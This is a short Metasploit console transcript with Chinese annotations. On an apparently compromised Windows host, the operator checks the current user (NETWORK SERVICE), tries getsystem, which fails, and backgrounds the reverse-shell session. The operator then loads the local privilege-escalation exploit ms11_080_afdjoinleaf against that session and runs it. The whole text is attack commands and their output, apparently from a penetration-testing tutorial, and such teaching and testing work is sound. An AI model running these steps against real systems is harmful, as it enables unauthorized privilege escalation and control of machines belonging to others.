meterpreter > getuid (获取当前权限)
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > getsystem (尝试提权操作)
[-]priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-]Named PipeImpersonation(In Memory/Admin)
[-]Named PipeImpersonation(Dropper/Admin)
[-]TokenDuplication(In Memory/Admin)
meterpreter > background (返回 选择提权exp)
[*]Backgrounding session1...
msfexploit(handler)> use exploit/windows/local/ms11_080_afdjoinleaf(选择提权exp)
msfexploit(ms11_080_afdjoinleaf)> set session1(载入当前反弹shell)
session =>1
msfexploit(ms11_080_afdjoinleaf)> exploit (执行)